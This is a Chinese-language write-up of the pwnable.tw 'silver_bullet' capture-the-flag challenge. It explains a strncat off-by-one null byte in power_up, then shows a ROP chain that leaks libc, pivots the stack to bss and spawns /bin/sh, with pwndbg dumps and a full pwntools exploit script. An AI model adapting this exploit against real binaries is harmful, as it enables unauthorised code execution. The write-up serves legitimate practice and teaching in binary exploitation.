Pwnable.tw silver_bullet

Pwnable.tw silver_bullet

好久之前做过一次，当时不怎么会调，栈构造的乱七八糟的，现在再来做感觉还是有点东西的😂

这题大概流程就是先create_bullet，再增加power，最后去挑战boss(HP=0x7f000000),成功就退出了，啊这

程序的漏洞点在power_up：

int __cdecl power_up(char *dest)
{
  char s; // [esp+0h] [ebp-34h]
  size_t v3; // [esp+30h] [ebp-4h]

  v3 = 0;
  memset(&s, 0, 0x30u);     //这里的dest是就是我所说的main函数s，而这里的s只是这个函数的局部变量。
  if ( !*dest )
    return puts("You need create the bullet first !");
  if ( *((_DWORD *)dest + 0xC) > 47u )
    return puts("You can't power up any more !");
  printf("Give me your another description of bullet :");
  read_input(&s, 0x30 - *((_DWORD *)dest + 12));
  strncat(dest, &s, 48 - *((_DWORD *)dest + 12));
  v3 = strlen(&s) + *((_DWORD *)dest + 12);
  printf("Your new power is : %u\n", v3);
  *((_DWORD *)dest + 12) = v3;
  return puts("Enjoy it !");
}

strncat函数在执行完拼接后会在末尾加上一个\0，如果我们先创造47个bullet然后再powe_up一个，那在strncat的时候就会在s+0x30的位置写入一个字节的\0，导致之前存放在这里的size数据被覆盖为0，然后再之后的strlen(&s) + *((_DWORD *)dest + 12)计算的结果就是1了。

从而我们有了继续向下拼接的机会，在之后的拼接会在s+0x30开始我们可以先伪造size大于0x7fffffff，然后就到了ebp的位置，伪造ebp为bss地址，返回地址用puts_plt覆盖，接下来写进去pop_ebx——ret作为puts的返回地址来清理栈并接着ret，之后写puts函数的参数为puts_got，然后写入input_read的地址，使得在pop_ebx_ret时去执行read_inputs，接下来设置read的参数为上面的bss的段和输入的size（够用就行），之后返回地址写成leave_ret使得两次leave把栈迁移到bss去执行我们input_read输入的system。

拼接的效果如下：

15:0054│ eax    0xffddc584 ◂— 0x61616161 ('aaaa')
... ↓
20:0080│        0xffddc5b0 ◂— 0x62616161 ('aaab')
21:0084│        0xffddc5b4 ◂— 0xffffff01        -->size
22:0088│        0xffddc5b8 —▸ 0x804b410 ◂— 0x0  -->bss
23:008c│        0xffddc5bc —▸ 0x80484a8 ◂— jmp    dword ptr [0x804afdc]  -->ret_addr
24:0090│        0xffddc5c0 —▸ 0x8048475 (_init+33) ◂— pop    ebx  -->pop_ret
25:0094│        0xffddc5c4 —▸ 0x804afdc (_GLOBAL_OFFSET_TABLE_+24) —▸ 0xf7d88cb0 (puts) ◂— push   ebp
26:0098│ edx-1  0xffddc5c8 —▸ 0x80485eb (read_input) ◂— push   ebp
27:009c│        0xffddc5cc —▸ 0x8048a18 (main+196) ◂— leave
28:00a0│        0xffddc5d0 —▸ 0x804b410 ◂— 0x0
29:00a4│        0xffddc5d4 ◂— 0x1011

之后执行beats获胜，main函数将执行返回

EAX  0x0
 EBX  0x0
 ECX  0xffffffff
 EDX  0xf7fa0870 (_IO_stdfile_1_lock) ◂— 0x0
 EDI  0xf7f9f000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
 ESI  0xf7f9f000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
 EBP  0x804b410 ◂— 0x0
 ESP  0xffb8d030 —▸ 0x8048475 (_init+33) ◂— pop    ebx
 EIP  0xf7e4bcb0 (puts) ◂— push   ebp
────────────────────────────────────────[ DISASM ]─────────────────────────────────────────
   0x80489db  <main+135>    mov    eax, 0
   0x80489e0  <main+140>    jmp    main+196 <0x8048a18>
    ↓
   0x8048a18  <main+196>    leave
   0x8048a19  <main+197>    ret
    ↓
   0x80484a8                jmp    dword ptr [0x804afdc] <0xf7e4bcb0>
    ↓
 ► 0xf7e4bcb0 <puts>        push   ebp
   0xf7e4bcb1 <puts+1>      mov    ebp, esp
   0xf7e4bcb3 <puts+3>      push   edi
   0xf7e4bcb4 <puts+4>      push   esi
   0xf7e4bcb5 <puts+5>      push   ebx
   0xf7e4bcb6 <puts+6>      call   __x86.get_pc_thunk.bx <0xf7f0bc55>
─────────────────────────────────────────[ STACK ]─────────────────────────────────────────
00:0000│ esp  0xffb8d030 —▸ 0x8048475 (_init+33) ◂— pop    ebx
01:0004│      0xffb8d034 —▸ 0x804afdc (_GLOBAL_OFFSET_TABLE_+24) —▸ 0xf7e4bcb0 (puts) ◂— push   ebp
02:0008│      0xffb8d038 —▸ 0x80485eb (read_input) ◂— push   ebp
03:000c│      0xffb8d03c —▸ 0x8048a18 (main+196) ◂— leave
04:0010│      0xffb8d040 —▸ 0x804b410 ◂— 0x0
05:0014│      0xffb8d044 ◂— 0x1011
06:0018│      0xffb8d048 —▸ 0xf7f9f000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
07:001c│      0xffb8d04c —▸ 0xf7fe7c04 ◂— 0x0

先执行puts(puts_got)

leak后返回到pop_rbx_ret清理stack并跳到read_input

EAX  0x5
EBX  0x804afdc (_GLOBAL_OFFSET_TABLE_+24) —▸ 0xf7e4bcb0 (puts) ◂— push   ebp
ECX  0xffffffff
EDX  0xf7fa0870 (_IO_stdfile_1_lock) ◂— 0x0
EDI  0xf7f9f000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
ESI  0xf7f9f000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
EBP  0x804b410 ◂— 0x0
ESP  0xffb8d03c —▸ 0x8048a18 (main+196) ◂— leave
EIP  0x80485eb (read_input) ◂— push   ebp
────────────────────────────────────────[ DISASM ]─────────────────────────────────────────
  0x8048475 <_init+33>         pop    ebx
  0x8048476 <_init+34>         ret
   ↓
► 0x80485eb <read_input>       push   ebp
  0x80485ec <read_input+1>     mov    ebp, esp
  0x80485ee <read_input+3>     sub    esp, 4
  0x80485f1 <read_input+6>     push   dword ptr [ebp + 0xc]
  0x80485f4 <read_input+9>     push   dword ptr [ebp + 8]
  0x80485f7 <read_input+12>    push   0
  0x80485f9 <read_input+14>    call   0x8048490

  0x80485fe <read_input+19>    add    esp, 0xc
  0x8048601 <read_input+22>    mov    dword ptr [ebp - 4], eax
─────────────────────────────────────────[ STACK ]─────────────────────────────────────────
00:0000│ esp  0xffb8d03c —▸ 0x8048a18 (main+196) ◂— leave
01:0004│      0xffb8d040 —▸ 0x804b410 ◂— 0x0
02:0008│      0xffb8d044 ◂— 0x1011

完成向0x804b410输入payload后进行栈迁移：

EAX  0x17
 EBX  0x804afdc (_GLOBAL_OFFSET_TABLE_+24) —▸ 0xf7e4bcb0 (puts) ◂— push   ebp
 ECX  0x804b410 ◂— 0x61616161 ('aaaa')
 EDX  0x16
 EDI  0xf7f9f000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
 ESI  0xf7f9f000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
 EBP  0x61616161 ('aaaa')
 ESP  0x804b414 —▸ 0xf7e26db0 (system) ◂— sub    esp, 0xc
 EIP  0x8048a19 (main+197) ◂— ret
────────────────────────────────────────[ DISASM ]─────────────────────────────────────────
   0x804862e  <read_input+67>    jne    read_input+83 <0x804863e>
    ↓
   0x804863e  <read_input+83>    mov    eax, dword ptr [ebp - 4]
   0x8048641  <read_input+86>    leave
   0x8048642  <read_input+87>    ret
    ↓
   0x8048a18  <main+196>         leave
 ► 0x8048a19  <main+197>         ret             <0xf7e26db0; system>
    ↓
   0xf7e26db0 <system>           sub    esp, 0xc
   0xf7e26db3 <system+3>         mov    eax, dword ptr [esp + 0x10]
   0xf7e26db7 <system+7>         call   __x86.get_pc_thunk.dx <0xf7f0bc5d>

   0xf7e26dbc <system+12>        add    edx, 0x178244
   0xf7e26dc2 <system+18>        test   eax, eax
─────────────────────────────────────────[ STACK ]─────────────────────────────────────────
00:0000│ esp  0x804b414 —▸ 0xf7e26db0 (system) ◂— sub    esp, 0xc
01:0004│      0x804b418 ◂— 0xdeadbeef
02:0008│      0x804b41c —▸ 0x804b420 ◂— '/bin/sh'
03:000c│      0x804b420 ◂— '/bin/sh'
04:0010│      0x804b424 ◂— 0x68732f /* '/sh' */
05:0014│      0x804b428 ◂— 0x0

leave_ret两次完成栈迁移,执行payload！！🚩

EXP：

from pwn import *
context.log_level='debug'

debug = 1
if debug:
    p = process('./silver_bullet')
    libc = ELF('/lib/i386-linux-gnu/libc.so.6')
else:
    p = remote('chall.pwnable.tw',10103)
    libc = ELF('../libc_32.so.6')

gdb.attach(p,'b*0x080489CF')
p.recvuntil(':')
p.sendline('1')
p.recvuntil(":")
p.send('a'*47)
p.recvuntil(':')
p.sendline('2')
p.recvuntil(":")
p.send('b')
p.recvuntil(':')
p.sendline('2')
p.recvuntil(":")
puts_plt = 0x80484a8
puts_got = 0x804afdc
fake_addr = 0x804b410

pr_addr = 0x08048475
lr_addr = 0x8048a18
read_input = 0x80485eb
payload3 = '\xff' * 3 + p32(fake_addr) + p32(puts_plt) + p32(pr_addr) + p32(puts_got) + p32(read_input) + p32(lr_addr) + p32(fake_addr) + p32(0x100)
#gdb,attach(p)
p.send(payload3)
p.recvuntil(':')
p.sendline('3')
p.recvuntil('Oh ! You win !!\n')
puts_addr = u32(p.recv(4))
system_addr = puts_addr - (libc.symbols['puts']-libc.symbols['system'])
payload = 'a'*4 + p32(system_addr) + p32(0xdeadbeef) + p32(fake_addr + 0x10) + '/bin/sh'
p.send(payload)
p.interactive()

这题漏洞在于数据布局不规范以及strncat函数的结尾添加\0的操作🕵️‍♀️

赏

谢谢你请我吃糖果